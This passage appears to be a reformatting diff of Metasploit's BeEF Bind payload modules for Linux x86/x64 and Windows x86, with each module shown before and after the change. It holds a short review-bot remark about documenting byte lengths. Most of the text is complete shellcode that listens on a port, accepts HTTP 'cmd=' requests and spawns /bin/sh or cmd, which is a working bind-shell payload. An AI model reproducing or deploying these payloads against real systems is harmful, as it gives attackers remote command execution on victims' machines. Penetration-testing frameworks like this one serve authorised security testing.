"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end


@@ -10,75 +10,72 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [168, 'n']
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" \
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" \
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" \
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" \
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" \
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" \
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" \
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" \
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" \
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" \
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" \
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" \
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" \
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" \
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" \
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" \
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" \
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" \
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" \
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" \
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" \
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" \
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" \
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" \
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" \
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" \
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" \
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" \
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" \
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" \
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" \
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" \
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" \
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" \
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end


@@ -2,7 +2,6 @@
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,123 +14,113 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [511, 'n']
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" \
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" \
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" \
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" \
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" \
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" \
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" \
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" \
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" \
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" \
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" \
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" \
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" \
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" \
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" \
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" \
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" \
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" \
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" \
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" \
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" \
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" \
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" \
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" \
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" \
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" \
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" \
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" \
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" \
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" \
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" \
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" \
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" \
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" \
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" \
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" \
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" \
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" \
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" \
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" \
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" \
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" \
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" \
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" \
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" \
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" \
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" \
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" \
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" \
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" \
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" \
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" \
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" \
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" \
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" \
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" \
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" \
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" \
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" \
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" \
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" \
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" \
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" \
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" \
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" \
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" \
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" \
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" \
"\xff\xd5\xe9\x58\xfe\xff\xff"
}))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end
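Review bot: The `'Payload'` literal under `'Stage'` is re-emitted in full (every `+` continuation becomes `\`), and the file gives a reviewer nothing to confirm the bytes are unchanged: no length, no digest, no pointer to the assembly source. A comment above the literal, for example `# Length: <N> bytes, built from <path to asm source>; LPORT is patched at offset 511`, would let a later formatting pass be checked mechanically instead of by eye. The Windows x86 stager further down already carries `# Length: 299 bytes`; the Linux x64 and x86 stagers have the same gap. Adjacent-literal continuation also produces one string literal, which is frozen under `# frozen_string_literal: true`, whereas the result of `+` is not; whether this file has that magic comment is not visible here.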


@@ -5,45 +5,40 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [54, 'n'] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" \
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" \
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" \
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" \
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" \
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" \
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" \
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" \
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" \
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" \
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" \
"\x01\xc6\xff\xe6"
}))
end
end


@@ -5,43 +5,38 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
